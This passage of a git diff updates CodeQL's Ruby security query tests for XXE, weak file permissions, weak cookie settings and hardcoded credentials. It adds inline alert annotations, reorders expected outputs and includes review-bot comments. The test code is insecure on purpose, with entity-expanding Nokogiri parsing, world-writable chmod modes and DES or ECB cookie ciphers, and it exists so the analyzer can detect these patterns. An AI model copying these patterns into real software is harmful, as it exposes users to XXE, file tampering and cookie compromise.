Nokogiri::XML::ParseOptions.new 2) # $ Alert options = Nokogiri::XML::ParseOptions.new 2048 options.noent - Nokogiri::XML::parse(content, nil, nil, options) - Nokogiri::XML::parse(content, nil, nil, (Nokogiri::XML::ParseOptions.new 0).noent) + Nokogiri::XML::parse(content, nil, nil, options) # $ Alert + Nokogiri::XML::parse(content, nil, nil, (Nokogiri::XML::ParseOptions.new 0).noent) # $ Alert - Nokogiri::XML::parse(content) { |x| x.noent } - Nokogiri::XML::parse(content) { |x| x.nononet } #FAIL + Nokogiri::XML::parse(content) { |x| x.noent } # $ Alert + Nokogiri::XML::parse(content) { |x| x.nononet } #FAIL # $ Alert Nokogiri::XML::parse(content) { |x| x.nodtdload } # OK - Nokogiri::XML::parse(content) { |x| x.nonet.noent.nodtdload } + Nokogiri::XML::parse(content) { |x| 
x.nonet.noent.nodtdload } # $ Alert Nokogiri::XML::parse(content, nil, nil, 2048) # OK - Nokogiri::XML::parse(content, nil, nil, 3) + Nokogiri::XML::parse(content, nil, nil, 3) # $ Alert Nokogiri::XML::parse(content) { |x| x.nonet.nodtdload } # OK - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT & ~Nokogiri::XML::ParseOptions::NOBLANKS) - Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET | Nokogiri::XML::ParseOptions::NOBLANKS) + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT & ~Nokogiri::XML::ParseOptions::NOBLANKS) # $ Alert + Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET | Nokogiri::XML::ParseOptions::NOBLANKS) # $ Alert end diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected index 44acc636b600..d6f2cdb6d2ac 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected 
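Review bot: `Nokogiri::XML::parse(content) { |x| x.nononet } #FAIL # $ Alert` keeps the old `#FAIL` marker beside a plain `# $ Alert`, which leaves it unclear whether the query actually reports this line. If it does, drop the stale marker: `Nokogiri::XML::parse(content) { |x| x.nononet } # $ Alert`; if it is a known miss, the annotation should be `# $ MISSING: Alert` instead. The visible part of `Xxe.expected` does not reach this line, so this needs checking against the full expected output. The remaining `#OK` / `# OK` comments in this file could be normalised in the same pass.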
@@ -1,3 +1,27 @@ +#select +| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | edges | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:4:34:4:40 | content | provenance | | | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:5:32:5:38 | content | provenance | | 
@@ -57,27 +81,3 @@ nodes | Nokogiri.rb:27:26:27:32 | content | semmle.label | content | | Nokogiri.rb:28:26:28:32 | content | semmle.label | content | subpaths -#select -| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref index 8ed653a4869f..50d9b176008c 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.qlref @@ -1 +1,2 @@ -queries/security/cwe-611/Xxe.ql +query: queries/security/cwe-611/Xxe.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb b/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb index 305bdb2d1470..00530836bb07 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb +++ b/ruby/ql/test/query-tests/security/cwe-732/FilePermissions.rb @@ -2,13 +2,13 @@ def run_chmod_1(filename) # BAD: sets file as world writable - FileUtils.chmod 0222, filename + FileUtils.chmod 0222, filename # $ Alert[rb/overly-permissive-file] # BAD: sets file as world writable - FileUtils.chmod 0622, filename + FileUtils.chmod 0622, filename # $ Alert[rb/overly-permissive-file] # BAD: sets file as world readable - FileUtils.chmod 0755, filename + FileUtils.chmod 0755, filename # $ Alert[rb/overly-permissive-file] # BAD: sets file as world readable + writable - FileUtils.chmod 0777, filename + FileUtils.chmod 0777, filename # $ Alert[rb/overly-permissive-file] end module DummyModule 
@@ -25,7 +25,7 @@ def run_chmod_2(filename) baz.chmod 0755, filename baz = bar # BAD: sets file as world readable - baz.chmod 0755, filename + baz.chmod 0755, filename # $ Alert[rb/overly-permissive-file] end def run_chmod_3(filename) @@ -48,26 +48,26 @@ def run_chmod_4(filename) end def run_chmod_5(filename) - perm = 0777 + perm = 0777 # $ Alert[rb/overly-permissive-file] # BAD: sets world rwx - FileUtils.chmod perm, filename + FileUtils.chmod perm, filename # $ Sink[rb/overly-permissive-file] perm2 = perm # BAD: sets world rwx - FileUtils.chmod perm2, filename + FileUtils.chmod perm2, filename # $ Sink[rb/overly-permissive-file] - perm = "u=wrx,g=rwx,o=x" + perm = "u=wrx,g=rwx,o=x" # $ Alert[rb/overly-permissive-file] perm2 = perm # BAD: sets group rwx - FileUtils.chmod perm2, filename + FileUtils.chmod perm2, filename # $ Sink[rb/overly-permissive-file] # BAD: sets file as world readable - FileUtils.chmod "u=rwx,o+r", filename + FileUtils.chmod "u=rwx,o+r", filename # $ Alert[rb/overly-permissive-file] # GOOD: sets file as group/world unreadable FileUtils.chmod "u=rwx,go-r", filename # BAD: sets group/world as +rw - FileUtils.chmod "a+rw", filename + FileUtils.chmod "a+rw", filename # $ Alert[rb/overly-permissive-file] end def run_chmod_R(filename) # BAD: sets file as world readable - FileUtils.chmod_R 0755, filename + FileUtils.chmod_R 0755, filename # $ Alert[rb/overly-permissive-file] end diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref b/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref index 7c8c5ca3c934..94f0b0dac3c2 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakCookieConfiguration.qlref @@ -1 +1,2 @@ -queries/security/cwe-732/WeakCookieConfiguration.ql +query: queries/security/cwe-732/WeakCookieConfiguration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
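Review bot: In `run_chmod_5` of FilePermissions.rb, the `# BAD` comments still sit above the `FileUtils.chmod` calls, but the `Alert[rb/overly-permissive-file]` tags are on the `perm = 0777` and `perm = "u=wrx,g=rwx,o=x"` assignments and the calls carry only `Sink[...]`. That matches WeakFilePermissions.expected, which reports the alert at the literal and names the chmod call as the sink, but a reader who follows the `# BAD` comments will look for the alert on the wrong line. A short comment above the first assignment would document the convention, for example `# alert is reported on the literal; the chmod calls it flows to are the sinks`.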
diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected index 802e76f63a50..f56d7886c572 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected 
@@ -1,3 +1,15 @@ +#select +| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | +| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | +| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | +| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | +| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. 
| FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | +| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | +| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | +| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | +| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | edges | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:53:19:53:22 | perm | provenance | | | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:54:3:54:7 | perm2 : Integer | provenance | | 
@@ -25,15 +37,3 @@ nodes | FilePermissions.rb:67:19:67:24 | "a+rw" | semmle.label | "a+rw" | | FilePermissions.rb:72:21:72:24 | 0755 | semmle.label | 0755 | subpaths -#select -| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | -| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | -| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | -| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | -| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. 
| FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | -| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | -| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | -| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | -| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref index bf19b31509d5..baceccada54c 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref @@ -1 +1,2 @@ -queries/security/cwe-732/WeakFilePermissions.ql +query: queries/security/cwe-732/WeakFilePermissions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb b/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb index 5b5604f4d783..e6993033b229 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb 
+++ b/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb @@ -11,16 +11,16 @@ class Application < Rails::Application config.action_dispatch.encrypted_cookie_cipher = "ChaCha" # BAD: weak block encryption algorithm - config.action_dispatch.encrypted_cookie_cipher = "DES" + config.action_dispatch.encrypted_cookie_cipher = "DES" # $ Alert[rb/weak-cookie-configuration] # BAD: weak block encryption mode - config.action_dispatch.encrypted_cookie_cipher = "AES-256-ECB" + config.action_dispatch.encrypted_cookie_cipher = "AES-256-ECB" # $ Alert[rb/weak-cookie-configuration] # GOOD config.action_dispatch.use_authenticated_cookie_encryption = true # BAD: less secure block encryption mode - config.action_dispatch.use_authenticated_cookie_encryption = false + config.action_dispatch.use_authenticated_cookie_encryption = false # $ Alert[rb/weak-cookie-configuration] # GOOD config.action_dispatch.cookies_same_site_protection = :lax @@ -29,9 +29,9 @@ class Application < Rails::Application config.action_dispatch.cookies_same_site_protection = "strict" # BAD: disabling same-site protections for sending cookies - config.action_dispatch.cookies_same_site_protection = :none + config.action_dispatch.cookies_same_site_protection = :none # $ Alert[rb/weak-cookie-configuration] # BAD: not all browsers default to `lax` if unset - config.action_dispatch.cookies_same_site_protection = nil + config.action_dispatch.cookies_same_site_protection = nil # $ Alert[rb/weak-cookie-configuration] end end diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected index a3f4ecb3ae9b..4f03b055ad10 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected 
@@ -1,3 +1,15 @@ +#select +| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | +| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | +| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | +| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." | HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. 
